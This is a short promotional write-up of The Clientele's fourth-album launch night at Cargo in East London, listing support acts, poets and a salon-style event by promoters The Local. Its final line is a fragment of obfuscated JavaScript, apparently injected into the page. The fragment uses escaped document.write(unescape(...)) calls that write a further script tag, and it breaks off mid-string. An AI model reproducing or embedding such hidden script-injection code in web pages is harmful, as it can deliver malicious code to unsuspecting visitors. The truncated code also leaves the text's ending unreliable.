With their fourth album due for release in October The Clientele are gearing up for their London Launch part on 10th October. A band that really must be seen live, this promises to be an explosive showcase event. East London stylish venue Cargo will play host with support from the distinctive The North Sea Radio Orchestra and folk sensationalist Emma Tricca. The night also features poetry from Tamsin Kendrick and Tim Wells who have been causing a stir on the spoken word scene to create a night of sophisticated musical styles.
Emerging from North London this four piece combine idyllic, layered sounds and idealistically wistful imagery, penned by singer / guitarist Alasdair Maclean that would sit happily on the west coast of America as easily as it does on their native soil. This sound has been attempted by many of The Clientele's peers but has never been mastered with such skill and accuracy. The Clientele's influences range from The Monkees to West Coast Pop Art Experimental Band to The Byrds and throughout the night they will be showcasing track from their new album God Save The Clientele.
Combine these hazy sounds with promoters The Local who have for this one off event created The Local Salon based on the style of the Parisian salons during the Age of Enlightenment. This night fuses together debate, spoken word and fantastic music.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
